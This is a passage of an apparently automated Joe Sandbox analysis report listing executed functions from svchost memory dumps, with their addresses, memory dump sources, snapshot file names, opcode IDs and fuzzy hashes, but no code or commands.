                                                                                                                  • Instruction ID: 4915411a683dac7933d61a5f963c15d7a6b25457ac4994c25f12c68b4ae7f820
                                                                                                                  • Opcode Fuzzy Hash: 6b980c04a4c8ab770d3c4b368e589fe52001641823e71bb280993c48717741c3
                                                                                                                  • Instruction Fuzzy Hash: 2A01479480DBC58FF346A3385852C39BFF0CB96211B0841AAE8CDC60A7D808994C83E2
                                                                                                                  Function 00007FFAAC3C0E67 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a631616ead08d61e90ddc9d69dc7408a0699b6d92d197dfa6030aa54e11afada
                                                                                                                  • Instruction ID: 96ae711fe3bd770c08b185ed72cc9feaff7addd701bee002bd1afbd40a9d6a08
                                                                                                                  • Opcode Fuzzy Hash: a631616ead08d61e90ddc9d69dc7408a0699b6d92d197dfa6030aa54e11afada
                                                                                                                  • Instruction Fuzzy Hash: BAE0ED65B149198FEF80EBACD845BFCA2D2EB9C252F1041B7D60ED3292DE2898458391

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFAAC3A1779 Relevance: 7.2, Strings: 5, Instructions: 904COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: 35f99e2ace41ce074c2b0b98f12de128129166694c2a60ef44cc0e4600863efb
                                                                                                                  • Instruction ID: d5c91f05b76464c72d58105a7361ec72163fb3c282973f1e76983b8aa5ff6483
                                                                                                                  • Opcode Fuzzy Hash: 35f99e2ace41ce074c2b0b98f12de128129166694c2a60ef44cc0e4600863efb
                                                                                                                  • Instruction Fuzzy Hash: C852D861B29A498FF794E778C459AB9F7D2EF89700F4445B9E00EC32D2DE29AC058781
                                                                                                                  Function 00007FFAAC3A2259 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: a7a466e88b258251c6cde416e1a5638f69f74b51b496efadd2ea4e3dee4f5ee1
                                                                                                                  • Instruction ID: ea37c7db289c501239dbde0019165ae06d80bb7ad9d6fa480a6f6234ffcf7d1f
                                                                                                                  • Opcode Fuzzy Hash: a7a466e88b258251c6cde416e1a5638f69f74b51b496efadd2ea4e3dee4f5ee1
                                                                                                                  • Instruction Fuzzy Hash: 7C516551A0E6C54FE786A7788865A76BFE4DF97215B0844FBE0CDC71E3DD09480AC392
                                                                                                                  Function 00007FFAAC3A09FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :P_^$k:P
                                                                                                                  • API String ID: 0-1581145465
                                                                                                                  • Opcode ID: 7cc6019efb04eda0970e0475e13005f03201ffc937b125e1c761d96f4a73829d
                                                                                                                  • Instruction ID: e26fbe00e549f7e3e3522b8ace919076b90c638ab9e1bd8a1d813aad17a62bc0
                                                                                                                  • Opcode Fuzzy Hash: 7cc6019efb04eda0970e0475e13005f03201ffc937b125e1c761d96f4a73829d
                                                                                                                  • Instruction Fuzzy Hash: CE01A76B6092A14DE702B6BDF491CEDAF58DF4523570842B3D3C9CD163C61454CA83D5
                                                                                                                  Function 00007FFAAC3A0650 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: dbd8bc7f62b8555c717cde748fb99a40bfe9f1690ad2e737b927d164946074b0
                                                                                                                  • Instruction ID: 0ff98600374ae7bc0a44a589ab06756fbc71fb0565b70e215e82a109aa9b726c
                                                                                                                  • Opcode Fuzzy Hash: dbd8bc7f62b8555c717cde748fb99a40bfe9f1690ad2e737b927d164946074b0
                                                                                                                  • Instruction Fuzzy Hash: 0D31C461B1C9480FE798EB7CD46AA79B7C6EB99311F0445BAE04EC32A3DD249C428381
                                                                                                                  Function 00007FFAAC3A0D81 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 48f494d8df1e03adb266ea0aa2591dc8929ed32dabb128e05de30ac33ee4d442
                                                                                                                  • Instruction ID: 0e82cb5eb30abd0fd86cfea0211c02cd5e5476a03aac9efb880ce90e633cbdf1
                                                                                                                  • Opcode Fuzzy Hash: 48f494d8df1e03adb266ea0aa2591dc8929ed32dabb128e05de30ac33ee4d442
                                                                                                                  • Instruction Fuzzy Hash: 1A21A362A1CF454FF784B7B8981ABB97AD5EB95710F0882BAE00EC3292DD18AC454391
                                                                                                                  Function 00007FFAAC3A130D Relevance: .5, Instructions: 514COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cc61676aa679502a8c339c54b6ea55f72e46956509ffa0a7954002cc4bc516c8
                                                                                                                  • Instruction ID: e4b7a534363a0d963a8ea6e3d8c827b2be591abbdc23f3115326f6ec036132db
                                                                                                                  • Opcode Fuzzy Hash: cc61676aa679502a8c339c54b6ea55f72e46956509ffa0a7954002cc4bc516c8
                                                                                                                  • Instruction Fuzzy Hash: 8941E872D1974A8FF744E7ACE8658ED7FB0EF46220F4841B7D14ED61B2DE2858068390
                                                                                                                  Function 00007FFAAC3A0705 Relevance: .2, Instructions: 245COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e5b30750176d051204cd09aad94c30769332de1e25b15188327617f0ada5d664
                                                                                                                  • Instruction ID: 8d8176768c20ed00f62e343707f262c0d5650eaf817bd88cdddfcad861197495
                                                                                                                  • Opcode Fuzzy Hash: e5b30750176d051204cd09aad94c30769332de1e25b15188327617f0ada5d664
                                                                                                                  • Instruction Fuzzy Hash: C3911D6290E7864FF301EB7CD465CE9BF61EF52304B1881BAC14EC73A7DA699409C791
                                                                                                                  Function 00007FFAAC3A0EEE Relevance: .2, Instructions: 202COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4288f5e6da07d37e0a6c58f975d34d2a90f9a3fdda72254f1ef044d85d5150e9
                                                                                                                  • Instruction ID: b96935157e969f8c0470a777e7b7df050e8d435076dad56dfaa4890d462fb0b0
                                                                                                                  • Opcode Fuzzy Hash: 4288f5e6da07d37e0a6c58f975d34d2a90f9a3fdda72254f1ef044d85d5150e9
                                                                                                                  • Instruction Fuzzy Hash: B8511662A0EA864FE356A73CD8669F57BD5DF87220B0940FBD08DC71A3DC19984783A1
                                                                                                                  Function 00007FFAAC3A0A68 Relevance: .2, Instructions: 189COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ee22147c1160f64aaa973bb77391a09e2d9550ea382ca634be8822bc2e0092d8
                                                                                                                  • Instruction ID: 4ec9d370932a6a4c16a11fa6ca7fe85a1234dbfac122ec07c5148b1ae40e8a32
                                                                                                                  • Opcode Fuzzy Hash: ee22147c1160f64aaa973bb77391a09e2d9550ea382ca634be8822bc2e0092d8
                                                                                                                  • Instruction Fuzzy Hash: D7410B6B60E5265EF600BABDF851DDE7F5CDF8623470882B7D249CB1A3C954608A83F0
                                                                                                                  Function 00007FFAAC3A0BF3 Relevance: .2, Instructions: 158COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1e96557f159432671b22be963dc586be56a9161a2a6651428c6a6790088e1cd9
                                                                                                                  • Instruction ID: f0381d3d951fc353a92117af130b5772312853addc9bc7e3695c4a2c44e8ebe1
                                                                                                                  • Opcode Fuzzy Hash: 1e96557f159432671b22be963dc586be56a9161a2a6651428c6a6790088e1cd9
                                                                                                                  • Instruction Fuzzy Hash: AE412675A18A4D9FFB44E7BCD451AEDBBA1EF89200F4485B6D00AC72A3CE28A445C790
                                                                                                                  Function 00007FFAAC3A0870 Relevance: .1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e36b79b50de5ed2a64f273e5e910e4bcefbf44a6cd6d3d357109446e786bb29a
                                                                                                                  • Instruction ID: 8cbb0e0265a05cd093b0259be66751d7675851f5f4d1ae46929e7be82eae7876
                                                                                                                  • Opcode Fuzzy Hash: e36b79b50de5ed2a64f273e5e910e4bcefbf44a6cd6d3d357109446e786bb29a
                                                                                                                  • Instruction Fuzzy Hash: 5B31A861A6974D5FE344E76CC0A5CA9FF71FF89300F8485A9D40BC33A6DE286900CB55
                                                                                                                  Function 00007FFAAC3A2421 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: add709683c7ced5c2b59c66595c63a08656167b414e1f07b24d0e53a41871b59
                                                                                                                  • Instruction ID: 2a0a3277c6fa0a6be45fd1f92c83dcfd634a178868c0d600c59ee3165e63d044
                                                                                                                  • Opcode Fuzzy Hash: add709683c7ced5c2b59c66595c63a08656167b414e1f07b24d0e53a41871b59
                                                                                                                  • Instruction Fuzzy Hash: B2017B8490DB814FF345A3385866C71BFF0CF97611B0845AAE4CDC60A7D80A995483D2
                                                                                                                  Function 00007FFAAC3A0E67 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001B.00000002.3402334813.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_27_2_7ffaac3a0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 632cbdf09896862180f42111d0b62347290bd5ecb9bd00ff976717f634b1b520
                                                                                                                  • Instruction ID: 1d55830f7f8db58417f7820ce9d4f17c569812a80972c619673aba3f457cd6bd
                                                                                                                  • Opcode Fuzzy Hash: 632cbdf09896862180f42111d0b62347290bd5ecb9bd00ff976717f634b1b520
                                                                                                                  • Instruction Fuzzy Hash: 1CE0ED61B149198FEF80EBACE845BFCB2D6EB9C211F1041B7E50ED3292DE2898418391